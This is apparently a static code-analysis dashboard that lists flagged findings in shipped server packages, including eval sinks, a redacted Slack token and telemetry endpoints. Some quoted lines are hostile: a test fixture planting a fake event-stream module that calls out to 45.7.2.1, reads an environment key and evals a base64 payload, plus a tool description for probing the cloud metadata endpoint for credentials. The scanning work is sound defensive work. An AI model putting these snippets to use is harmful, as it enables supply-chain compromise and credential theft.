Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 85% of 59,151 analyzable servers
50064 analyzed
8099 re-analysis due
988 not analyzable
0 not yet analyzed
4803 source gone
not analyzable
789 too large 199 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. HIGH dynamic exec motet-ai/motet __import__() __import__(module)
  2. HIGH dynamic exec motet-ai/motet pickle.loads() spec = pickle.loads(cached_spec_data)
  3. HIGH dynamic exec motet-ai/motet eval()/exec() result = eval(expression, {"__builtins__": {}}, {})
  4. MEDIUM suspicious endpoint Wood-Fired-Games/wood-fired-tasks 8.8.8.8 expect(assertEndpointAllowed('http://8.8.8.8/in').allowed).toBe(false);
  5. MEDIUM suspicious endpoint Wood-Fired-Games/wood-fired-tasks 172.32.0.1 expect(assertEndpointAllowed('http://172.32.0.1/in').allowed).toBe(false); // outside /12
  6. HIGH committed secret Wood-Fired-Games/wood-fired-tasks Slack token xoxb-y…(24 chars, redacted)
  7. MEDIUM suspicious endpoint agentcathq/agentcat-typescript-sdk eu.i.posthog.com (telemetry) host: "https://eu.i.posthog.com",
  8. MEDIUM suspicious endpoint agentcathq/agentcat-typescript-sdk us.i.posthog.com (telemetry) expect(url).toBe("https://us.i.posthog.com/batch");
  9. MEDIUM suspicious endpoint agentcathq/agentcat-typescript-sdk us.i.posthog.com (telemetry) const host = (config.host || "https://us.i.posthog.com").replace(/\/$/, "");
  10. HIGH dynamic exec vectorstep-service-mcp __import__ sink env={**__import__("os").environ, "CONFIG_PATH": str(config_path)},
    vectorstep_service_mcp-0.1.3/tests/ test_e2e.py :64
  11. MEDIUM suspicious endpoint 1420079678-ctrl/agent-body 1.2.3.4 target: { type: 'string', required: true, description: '目标:URL(如 http://1.2.3.4:8080)或 域名/IP(默认 80/443)' },
  12. HIGH dynamic exec 1420079678-ctrl/agent-body vm exec vm.runInNewContext(code, sandbox, { timeout: 1500, filename: 'acw-challenge.js' })
  13. MEDIUM suspicious endpoint 1420079678-ctrl/agent-body 169.254.169.254 (cloud metadata) meta: { type: 'string', description: '云元数据端点(如 http://169.254.169.254/latest/meta-data/,探测可达性与凭证)' },
  14. MEDIUM suspicious endpoint 1420079678-ctrl/agent-body 1.2.3.4 target: { type: 'string', required: true, description: '目标 URL,如 http://example.com/login.php 或 http://1.2.3.4:8080/' },
  15. MEDIUM suspicious endpoint 1420079678-ctrl/agent-body 45.7.2.1 writeFileSync(join(tmp, 'node_modules', 'event-stream', 'index.js'), `var http=require('http');http.get('http://45.7.2.1/a');process.env.KEY;eval(Buffer.from('YQ==').toString())`)